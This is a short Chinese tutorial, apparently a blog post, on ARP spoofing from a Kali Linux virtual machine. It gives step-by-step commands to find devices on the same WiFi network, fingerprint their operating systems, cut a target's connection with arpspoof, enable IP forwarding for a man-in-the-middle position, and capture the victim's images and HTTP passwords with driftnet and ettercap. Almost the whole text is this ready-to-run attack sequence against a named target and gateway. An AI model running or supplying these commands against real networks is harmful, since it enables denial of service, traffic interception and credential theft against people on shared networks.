Kali虚拟机下的arp欺骗

arp攻击

查看本机ip

使用指令ifconfig inet之后的便是IPV4地址

Kali虚拟机下的arp欺骗_第1张图片

查一下和自己在同一WiFi下的其他设备

命令: fping -g -r 0 -s 192.168.31.48/24 | grep alive

进行目标IP系统探测(探测是什么系统:电脑or手机)

命令:nmap -T4 -O (目标IP)

arp断网攻击

命令:arpspoof -i eth0 -t 192.168.31.140 -r 192.168.31.1

形式:arpspoof -i eth0(一般虚拟机默认为此) -t 目标IP -r 网关

arp欺骗

查本机ip -------------- ifconfig

查和自己处在同一WiFi下的IP ------------ fping -g -r 0 -s 192.168.31.48/24 | grep alive

既然是欺骗,那就不能让目标主机断网,所以要更改配置文件

命令:echo 1 > /proc/sys/net/ipv4/ip_forward

cat /proc/sys/net/ipv4/ip_forward

arp攻击

命令:arpspoof -i eth0 -t 192.168.31.140 -r 192.168.31.1

抓图片

driftnet -i eth0

实现密码嗅探

ettercap -Tq -i eth0

注意:图片嗅探会有延迟,没有想象中那么及时。
密码嗅探只能嗅探http的,https不行。
欢迎大家批评指正,本文仅供小白满足好奇心。

你可能感兴趣的:(Kali虚拟机下的arp欺骗)